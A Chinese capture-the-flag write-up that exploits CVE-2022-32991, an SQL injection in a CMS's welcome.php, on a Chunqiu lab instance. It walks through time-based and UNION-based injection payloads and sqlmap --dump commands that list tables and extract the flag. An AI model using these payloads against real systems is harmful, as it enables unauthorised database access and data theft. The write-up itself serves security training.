春秋云境:CVE-2022-32991(sql注入)

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

获取登录地址

http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80

登录注册

注册成功登录进入注册接口

参数接口一
发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1

SQL盲注未发现利用点
http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1' or '1'=1

继续下一步 查看接口和参数情况

参数接口二:

q step eid  n t等http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

注入点判断方式

参数后加'

参数后加'%2b(select*from(select(sleep(20)))a)%2b'

参数后加' union select 1,2,3,4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694%27%20union%20select%201,2,3,4,5--+&n=1&t=34

查询数据库名

n=2' union select 1,2,database(),4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694n=2%27%20union%20select%201,2,database(),4,5--+&n=1&t=34

查看表信息

2' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+&n=1&t=34

查询表字段信息

' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+

 查看flag表中的字段

2' union select 1,2,group_concat(flag),4,5 from flag--+

发现接口参数 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694' union select 1,2,group_concat(flag),4,5

 flag{e5fb9a56-bfce-48cb-a816-77599da3b03a}

burusuite使用 

 burpsuite也是一款强大的漏扫工具,通过爬取接口进行扫描发现 接口是否存在安全隐患,具体使用教程就不说了,看个人习惯

 

sqlmap使用 

 暴库

保存txt文件执行

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -dbs

爆破表 

python sqlmap.py -r D:/bc1.txt --batch -D "ctf" --tables

爆破表字段 

 python sqlmap.py -r D:/bc1.txt --batch -D "ctf" -T "flag" --columns

爆破具体字段信息

执行--batch -D "ctf" -T "flag" -C "flag" --dump

  flag{e5fb9a56-bfce-48cb-a816-77599da3b03a} 

SQL注入寻找接口,寻找参数, 寻找注入点, 进行sql盲注 ,查看响应结果值, 工具可以使用sqlmap bp进行测试验证 

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2023-12-06 18:22:04       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-06 18:22:04       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-06 18:22:04       20 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-06 18:22:04       20 阅读

热门阅读

  1. 数据分析NumPy

    2023-12-06 18:22:04       38 阅读
  2. PHP常用系统函数的 学习资料

    2023-12-06 18:22:04       28 阅读
  3. OpenGL 变换(Transformations)编程

    2023-12-06 18:22:04       40 阅读
  4. 【Linux 无网络状态下离线安装 MySQL】

    2023-12-06 18:22:04       40 阅读
  5. 数据结构 / 队列 / 循环队列 / 入队列和出队列

    2023-12-06 18:22:04       41 阅读
  6. 我又回来了

    2023-12-06 18:22:04       32 阅读
  7. css Position(定位)

    2023-12-06 18:22:04       32 阅读
  8. 【kafka实践】10|消费者重平衡

    2023-12-06 18:22:04       35 阅读